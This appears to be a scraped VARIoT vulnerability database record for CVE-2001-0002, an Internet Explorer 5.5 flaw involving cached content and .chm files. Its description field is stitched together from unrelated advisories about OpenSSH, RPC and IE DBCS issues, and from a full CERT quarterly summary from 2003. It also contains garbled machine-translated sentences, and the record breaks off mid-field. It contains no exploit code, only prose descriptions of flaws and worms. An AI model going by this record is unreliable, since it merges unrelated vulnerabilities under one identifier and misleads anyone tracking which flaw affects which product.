Vulnerability from variot - Updated: 2024-07-04 22:18Internet Explorer 5.5 and earlier allows remote attackers to obtain the physical location of cached content and open the content in the Local Computer Zone, then use compiled HTML help (.chm) files to execute arbitrary programs. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft's Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. Certain versions of Microsoft Internet Explorer (IE) that support double-byte character sets (DBCS) contain a buffer overflow vulnerability in the Type attribute of the OBJECT element. A remote attacker could execute arbitrary code with the privileges of the user running IE. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Internet Explorer Is XML There is a problem with the style sheet processing, and even if the script is disabled in the security zone, the script will be executed. Outlook Express Including many MUA Then XML Document IE Since it is displayed using the component of, the script may be executed just by displaying the mail.Please refer to the “Overview” for the impact of this vulnerability. We are sending this message to help ensure that administrators have not overlooked one or more of these vulnerabilities.
There have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues are exploitable, but they are resolved in version 3.7.1. These four additional flaws are believed to be relatively minor, and are scheduled to be included in the next version of OpenSSH. Exploitation of this vulnerability may lead to a remote attacker gaining privileged access to the server, in some cases root access.
VU#209807 - Portable OpenSSH server PAM conversion stack corruption http://www.kb.cert.org/vuls/id/209807
There is a vulnerability in portable versions of OpenSSH 3.7p1 and 3.7.1p1 that may permit an attacker to corrupt the PAM conversion stack.
Please check the vulnerability notes for resolutions and additional details.
Thank you. -----BEGIN PGP SIGNED MESSAGE-----
CERT Summary CS-2003-04
November 24, 2003
Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information.
Past CERT summaries are available from:
CERT Summaries
http://www.cert.org/summaries/
Recent Activity
Since the last regularly scheduled CERT summary, issued in September 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft Windows Workstation Service, RPCSS Service, and Exchange. We have received reports of W32/Swen.A, W32/Mimail variants, and exploitation of an Internet Explorer vulnerability reported in August of 2003.
For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.
CERT/CC Current Activity
http://www.cert.org/current/current_activity.html
1. W32/Mimail Variants
The CERT/CC has received reports of several new variants of the
'Mimail' worm. The most recent variant of the worm (W32/Mimail.J)
arrives as an email message alleging to be from the Paypal
financial service. The message requests that the recipient
'verify' their account information to prevent the suspension of
their Paypal account. Attached to the email is an executable file
which captures this information (if entered), and sends it to a
number of email addresses.
Current Activity - November 19, 2003
http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili
2.
CERT Advisory CA-2003-28
Buffer Overflow in Windows Workstation Service
http://www.cert.org/advisories/CA-2003-28.html
Vulnerability Note VU#567620
Microsoft Windows Workstation service vulnerable to
buffer overflow when sent specially crafted network
message
http://www.kb.cert.org/vuls/id/567620
3.
CERT Advisory CA-2003-27
Multiple Vulnerabilities in Microsoft Windows and
Exchange
http://www.cert.org/advisories/CA-2003-27.html
Vulnerability Note VU#575892
Buffer overflow in Microsoft Windows Messenger Service
http://www.kb.cert.org/vuls/id/575892
Vulnerability Note VU#422156
Microsoft Exchange Server fails to properly handle
specially crafted SMTP extended verb requests
http://www.kb.cert.org/vuls/id/422156
Vulnerability Note VU#467036
Microsoft Windows Help and support Center contains buffer
overflow in code used to handle HCP protocol
http://www.kb.cert.org/vuls/id/467036
Vulnerability Note VU#989932
Microsoft Windows contains buffer overflow in Local
Troubleshooter ActiveX control (Tshoot.ocx)
http://www.kb.cert.org/vuls/id/989932
Vulnerability Note VU#838572
Microsoft Windows Authenticode mechanism installs ActiveX
controls without prompting user
http://www.kb.cert.org/vuls/id/838572
Vulnerability Note VU#435444
Microsoft Outlook Web Access (OWA) contains cross-site
scripting vulnerability in the "Compose New Message" form
http://www.kb.cert.org/vuls/id/435444
Vulnerability Note VU#967668
Microsoft Windows ListBox and ComboBox controls vulnerable
to buffer overflow when supplied crafted Windows message
http://www.kb.cert.org/vuls/id/967668
4. Multiple Vulnerabilities in SSL/TLS Implementations
Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)
and Transport Layer Security (TLS) protocols allowing an attacker
to execute arbitrary code or cause a denial-of-service condition.
CERT Advisory CA-2003-26
Multiple Vulnerabilities in SSL/TLS Implementations
http://www.cert.org/advisories/CA-2003-26.html
Vulnerability Note VU#935264
OpenSSL ASN.1 parser insecure memory deallocation
http://www.kb.cert.org/vuls/id/935264
Vulnerability Note VU#255484
OpenSSL contains integer overflow handling ASN.1 tags (1)
http://www.kb.cert.org/vuls/id/255484
Vulnerability Note VU#380864
OpenSSL contains integer overflow handling ASN.1 tags (2)
http://www.kb.cert.org/vuls/id/380864
Vulnerability Note VU#686224
OpenSSL does not securely handle invalid public key when
configured to ignore errors
http://www.kb.cert.org/vuls/id/686224
Vulnerability Note VU#732952
OpenSSL accepts unsolicited client certificate messages
http://www.kb.cert.org/vuls/id/732952
Vulnerability Note VU#104280
Multiple vulnerabilities in SSL/TLS implementations
http://www.kb.cert.org/vuls/id/104280
Vulnerability Note VU#412478
OpenSSL 0.9.6k does not properly handle ASN.1 sequences
http://www.kb.cert.org/vuls/id/412478
5. Exploitation of Internet Explorer Vulnerability
The CERT/CC received a number of reports indicating that attackers
were actively exploiting the Microsoft Internet Explorer
vulnerability described in VU#865940. These attacks include the
installation of tools for launching distributed denial-of-service
(DDoS) attacks, providing generic proxy services, reading
sensitive information from the Windows registry, and using a
victim system's modem to dial pay-per-minute services. The
vulnerability described in VU#865940 exists due to an interaction
between IE's MIME type processing and the way it handles HTML
application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm
On September 19, the CERT/CC began receiving a large volume of
reports of a mass mailing worm, referred to as W32/Swen.A,
spreading on the Internet. Similar to W32/Gibe.B in function, this
worm arrives as an attachment claiming to be a Microsoft Internet
Explorer Update or a delivery failure notice from qmail. The
W32/Swen.A worm requires a user to execute the attachment either
manually or by using an email client that will open the attachment
automatically. Upon opening the attachment, the worm attempts to
mail itself to all email addresses it finds on the system. The
CERT/CC updated the current activity page to contain further
information on this worm.
Current Activity - September 19, 2003
http://www.cert.org/current/archive/2003/09/19/archive.html#swena
7. Buffer Overflow in Sendmail
Sendmail, a widely deployed mail transfer agent (MTA), contains a
vulnerability that could allow an attacker to execute arbitrary
code with the privileges of the sendmail daemon, typically root.
CERT Advisory CA-2003-25
Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-25.html
Vulnerability Note VU#784980
Sendmail prescan() buffer overflow vulnerability
http://www.kb.cert.org/vuls/id/784980
8.
CERT Advisory CA-2003-23
RPCSS Vulnerabilities in Microsoft Windows
http://www.cert.org/advisories/CA-2003-23.html
Vulnerability Note VU#483492
Microsoft Windows RPCSS Service contains heap overflow in
DCOM activation routines
http://www.kb.cert.org/vuls/id/483492
Vulnerability Note VU#254236
Microsoft Windows RPCSS Service contains heap overflow in
DCOM request filename handling
http://www.kb.cert.org/vuls/id/254236
Vulnerability Note VU#326746
Microsoft Windows RPC service vulnerable to
denial of service
http://www.kb.cert.org/vuls/id/326746
New CERT Coordination Center (CERT/CC) PGP Key
On October 15, the CERT/CC issued a new PGP key, which should be used when sending sensitive information to the CERT/CC.
CERT/CC PGP Public Key
https://www.cert.org/pgp/cert_pgp_key.asc
Sending Sensitive Information to the CERT/CC
https://www.cert.org/contact_cert/encryptmail.html
What's New and Updated
Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Congressional Testimony http://www.cert.org/congressional_testimony * Training Schedule http://www.cert.org/training/ * CSIRT Development http://www.cert.org/csirts/
This document is available from: http://www.cert.org/summaries/CS-2003-04.html
CERT/CC Contact Information
Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A.
CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site http://www.cert.org/
To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message
subscribe cert-advisory
- "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.
NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright \xa92003 Carnegie Mellon University.
-----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8
iQCVAwUBP8JVOZZ2NNT/dVAVAQGL9wP+I18NJBUBuv7b0pam5La7E7qOQFMn5n78 7i0gBX/dKgaY5siM6jBYYwCbbA7Y0/Jwtby2zHp1s8RHZY5/3JEzElfv4TLlR8rT rb8gJDbpan2JWA6xH9IzqZaSrxrXpNypwU2wWxR2osmbYl8FdV0rD3ZYXJjyi+nU UENALuNdthA= =DD60 -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200107-0045",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 3.2,
"vendor": "microsoft",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": null,
"scope": null,
"trust": 1.6,
"vendor": "mandriva",
"version": null
},
{
"model": "windows script host",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.1"
},
{
"model": "windows script host",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "internet explorer",
"scope": "lte",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "appgate network security ab",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cray",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cyclades",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "debian linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "f secure",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "foundry",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "guardian digital",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ibm eserver",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ingrian",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "juniper",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mirapoint",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "network appliance",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nokia",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openpkg",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openssh",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "openwall gnu linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "red hat",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "riverstone",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "suse linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "slackware",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sun microsystems",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "tfs",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "trustix secure linux",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "vmware",
"version": null
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.5"
},
{
"model": "ie",
"scope": "eq",
"trust": 0.6,
"vendor": "microsoft",
"version": "5.01"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:windows_script_host:5.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:windows_script_host:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "5.5",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovered by Georgi Guninski \u003cguninski@guninski.com\u003e on Nov 20, 2000 and posted in a Microsoft Security Bulletin (MS01-015).",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
}
],
"trust": 0.6
},
"cve": "CVE-2001-0002",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2001-0002",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2001-0002",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#333628",
"trust": 0.8,
"value": "28.98"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#483492",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#326746",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#254236",
"trust": 0.8,
"value": "94.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#334928",
"trust": 0.8,
"value": "7.09"
},
{
"author": "CNNVD",
"id": "CNNVD-200107-151",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#333628"
},
{
"db": "CERT/CC",
"id": "VU#483492"
},
{
"db": "CERT/CC",
"id": "VU#326746"
},
{
"db": "CERT/CC",
"id": "VU#254236"
},
{
"db": "CERT/CC",
"id": "VU#334928"
},
{
"db": "JVNDB",
"id": "JVNDB-2001-000056"
},
{
"db": "CNNVD",
"id": "CNNVD-200107-151"
},
{
"db": "NVD",
"id": "CVE-2001-0002"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 5.5 and earlier allows remote attackers to obtain the physical location of cached content and open the content in the Local Computer Zone, then use compiled HTML help (.chm) files to execute arbitrary programs. Versions of the OpenSSH server prior to 3.7.1 contain buffer management errors. While the full impact of these vulnerabilities are unclear, they may lead to memory corruption and a denial-of-service situation. A vulnerability exists in Microsoft\u0027s Remote Procedure Call (RPC) implementation. A remote attacker could exploit this vulnerability to cause a denial of service. An exploit for this vulnerability is publicly available. Certain versions of Microsoft Internet Explorer (IE) that support double-byte character sets (DBCS) contain a buffer overflow vulnerability in the Type attribute of the OBJECT element. A remote attacker could execute arbitrary code with the privileges of the user running IE. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Internet Explorer Is XML There is a problem with the style sheet processing, and even if the script is disabled in the security zone, the script will be executed. Outlook Express Including many MUA Then XML Document IE Since it is displayed using the component of, the script may be executed just by displaying the mail.Please refer to the \u201cOverview\u201d for the impact of this vulnerability. We are sending this message to help ensure that\nadministrators have not overlooked one or more of these vulnerabilities. \n\nThere have been several recent vulnerabilities affecting OpenSSH. It is unclear if these issues \n are exploitable, but they are resolved in version 3.7.1. These four additional \n flaws are believed to be relatively minor, and are scheduled to be\n included in the next version of OpenSSH. \n Exploitation of this vulnerability may lead to a remote attacker \n gaining privileged access to the server, in some cases root access. \n\nVU#209807 - Portable OpenSSH server PAM conversion stack corruption\nhttp://www.kb.cert.org/vuls/id/209807\n\n There is a vulnerability in portable versions of OpenSSH 3.7p1 and\n 3.7.1p1 that may permit an attacker to corrupt the PAM conversion\n stack. \n\nPlease check the vulnerability notes for resolutions and additional \ndetails. \n\nThank you. \n-----BEGIN PGP SIGNED MESSAGE-----\n\nCERT Summary CS-2003-04\n\n November 24, 2003\n\n Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT\n Summary to draw attention to the types of attacks reported to our\n incident response team, as well as other noteworthy incident and\n vulnerability information. \n\n Past CERT summaries are available from:\n\n CERT Summaries\n http://www.cert.org/summaries/\n ______________________________________________________________________\n\nRecent Activity\n\n Since the last regularly scheduled CERT summary, issued in September\n 2003 (CS-2003-03), we have documented vulnerabilities in the Microsoft\n Windows Workstation Service, RPCSS Service, and Exchange. \n We have received reports of W32/Swen.A, W32/Mimail variants, and\n exploitation of an Internet Explorer vulnerability reported in August\n of 2003. \n\n For more current information on activity being reported to the\n CERT/CC, please visit the CERT/CC Current Activity page. The Current\n Activity page is a regularly updated summary of the most frequent,\n high-impact types of security incidents and vulnerabilities being\n reported to the CERT/CC. The information on the Current Activity page\n is reviewed and updated as reporting trends change. \n\n CERT/CC Current Activity\n http://www.cert.org/current/current_activity.html\n\n\n 1. W32/Mimail Variants\n\n The CERT/CC has received reports of several new variants of the\n \u0027Mimail\u0027 worm. The most recent variant of the worm (W32/Mimail.J)\n arrives as an email message alleging to be from the Paypal\n financial service. The message requests that the recipient\n \u0027verify\u0027 their account information to prevent the suspension of\n their Paypal account. Attached to the email is an executable file\n which captures this information (if entered), and sends it to a\n number of email addresses. \n\n Current Activity - November 19, 2003\n http://www.cert.org/current/archive/2003/11/19/archive.html#mimaili\n\n\n 2. \n\n CERT Advisory CA-2003-28\n\t\tBuffer Overflow in Windows Workstation Service\n http://www.cert.org/advisories/CA-2003-28.html\n\n Vulnerability Note VU#567620\n\t\tMicrosoft Windows Workstation service vulnerable to \n\t\tbuffer overflow when sent specially crafted network\n\t\tmessage\n http://www.kb.cert.org/vuls/id/567620\n\n\n 3. \n\n CERT Advisory CA-2003-27\n\t\tMultiple Vulnerabilities in Microsoft Windows and \n\t\tExchange\n http://www.cert.org/advisories/CA-2003-27.html\n\n Vulnerability Note VU#575892\n\t\tBuffer overflow in Microsoft Windows Messenger Service\n http://www.kb.cert.org/vuls/id/575892\n\n Vulnerability Note VU#422156\n\t\tMicrosoft Exchange Server fails to properly handle\n\t\tspecially crafted SMTP extended verb requests\n http://www.kb.cert.org/vuls/id/422156\n\n Vulnerability Note VU#467036\n\t\tMicrosoft Windows Help and support Center contains buffer\n\t\toverflow in code used to handle HCP protocol\n http://www.kb.cert.org/vuls/id/467036\n\n Vulnerability Note VU#989932\n\t\tMicrosoft Windows contains buffer overflow in Local \n\t\tTroubleshooter ActiveX control (Tshoot.ocx)\n http://www.kb.cert.org/vuls/id/989932\n\n Vulnerability Note VU#838572\n\t\tMicrosoft Windows Authenticode mechanism installs ActiveX\n\t\tcontrols without prompting user\n http://www.kb.cert.org/vuls/id/838572\n\n Vulnerability Note VU#435444\n\t\tMicrosoft Outlook Web Access (OWA) contains cross-site\n\t\tscripting vulnerability in the \"Compose New Message\" form\n http://www.kb.cert.org/vuls/id/435444\n\n Vulnerability Note VU#967668\n\t\tMicrosoft Windows ListBox and ComboBox controls vulnerable\n\t\tto buffer overflow when supplied crafted Windows message\n http://www.kb.cert.org/vuls/id/967668\n\n\n 4. Multiple Vulnerabilities in SSL/TLS Implementations\n\n Multiple vulnerabilities exist in the Secure Sockets Layer (SSL)\n and Transport Layer Security (TLS) protocols allowing an attacker\n to execute arbitrary code or cause a denial-of-service condition. \n\n CERT Advisory CA-2003-26\n\t\tMultiple Vulnerabilities in SSL/TLS Implementations\n http://www.cert.org/advisories/CA-2003-26.html\n\n Vulnerability Note VU#935264\n\t\tOpenSSL ASN.1 parser insecure memory deallocation\n http://www.kb.cert.org/vuls/id/935264\n\n Vulnerability Note VU#255484\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (1)\n http://www.kb.cert.org/vuls/id/255484\n\n Vulnerability Note VU#380864\n\t\tOpenSSL contains integer overflow handling ASN.1 tags (2)\n http://www.kb.cert.org/vuls/id/380864\n\n Vulnerability Note VU#686224\n\t\tOpenSSL does not securely handle invalid public key when\n\t\tconfigured to ignore errors\n http://www.kb.cert.org/vuls/id/686224\n\n Vulnerability Note VU#732952\n\t\tOpenSSL accepts unsolicited client certificate messages\n http://www.kb.cert.org/vuls/id/732952\n\n Vulnerability Note VU#104280\n\t\tMultiple vulnerabilities in SSL/TLS implementations\n http://www.kb.cert.org/vuls/id/104280\n\n Vulnerability Note VU#412478\n\t\tOpenSSL 0.9.6k does not properly handle ASN.1 sequences\n http://www.kb.cert.org/vuls/id/412478\n\n\n 5. Exploitation of Internet Explorer Vulnerability\n\n The CERT/CC received a number of reports indicating that attackers\n were actively exploiting the Microsoft Internet Explorer\n vulnerability described in VU#865940. These attacks include the\n installation of tools for launching distributed denial-of-service\n (DDoS) attacks, providing generic proxy services, reading\n sensitive information from the Windows registry, and using a\n victim system\u0027s modem to dial pay-per-minute services. The\n vulnerability described in VU#865940 exists due to an interaction\n between IE\u0027s MIME type processing and the way it handles HTML\n application (HTA) files embedded in OBJECT tags. W32/Swen.A Worm\n\n On September 19, the CERT/CC began receiving a large volume of\n reports of a mass mailing worm, referred to as W32/Swen.A,\n spreading on the Internet. Similar to W32/Gibe.B in function, this\n worm arrives as an attachment claiming to be a Microsoft Internet\n Explorer Update or a delivery failure notice from qmail. The\n W32/Swen.A worm requires a user to execute the attachment either\n manually or by using an email client that will open the attachment\n automatically. Upon opening the attachment, the worm attempts to\n mail itself to all email addresses it finds on the system. The\n CERT/CC updated the current activity page to contain further\n information on this worm. \n\n Current Activity - September 19, 2003\n http://www.cert.org/current/archive/2003/09/19/archive.html#swena\n\n\n 7. Buffer Overflow in Sendmail\n\n Sendmail, a widely deployed mail transfer agent (MTA), contains a\n vulnerability that could allow an attacker to execute arbitrary\n code with the privileges of the sendmail daemon, typically root. \n\n CERT Advisory CA-2003-25\n\t\tBuffer Overflow in Sendmail\n http://www.cert.org/advisories/CA-2003-25.html\n\n Vulnerability Note VU#784980\n\t\tSendmail prescan() buffer overflow vulnerability\n http://www.kb.cert.org/vuls/id/784980\n\n\n 8. \n\n CERT Advisory CA-2003-23\n\t\tRPCSS Vulnerabilities in Microsoft Windows\n http://www.cert.org/advisories/CA-2003-23.html\n\n Vulnerability Note VU#483492\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM activation routines\n http://www.kb.cert.org/vuls/id/483492\n\n Vulnerability Note VU#254236\n\t\tMicrosoft Windows RPCSS Service contains heap overflow in\n\t\tDCOM request filename handling\n http://www.kb.cert.org/vuls/id/254236\n\n Vulnerability Note VU#326746\n\t\tMicrosoft Windows RPC service vulnerable to \n\t\tdenial of service\n http://www.kb.cert.org/vuls/id/326746\n ______________________________________________________________________\n\nNew CERT Coordination Center (CERT/CC) PGP Key\n\n On October 15, the CERT/CC issued a new PGP key, which should be used\n when sending sensitive information to the CERT/CC. \n\n CERT/CC PGP Public Key\n https://www.cert.org/pgp/cert_pgp_key.asc\n\n Sending Sensitive Information to the CERT/CC\n https://www.cert.org/contact_cert/encryptmail.html\n ______________________________________________________________________\n\nWhat\u0027s New and Updated\n\n Since the last CERT Summary, we have published new and updated\n * Advisories\n http://www.cert.org/advisories/\n * Vulnerability Notes\n http://www.kb.cert.org/vuls\n * CERT/CC Statistics\n http://www.cert.org/stats/cert_stats.html\n * Congressional Testimony\n http://www.cert.org/congressional_testimony\n * Training Schedule\n http://www.cert.org/training/\n * CSIRT Development\n http://www.cert.org/csirts/\n ______________________________________________________________________\n\n This document is available from:\n http://www.cert.org/summaries/CS-2003-04.html\n ______________________________________________________________________\n\nCERT/CC Contact Information\n\n Email: cert@cert.org\n Phone: +1 412-268-7090 (24-hour hotline)\n Fax: +1 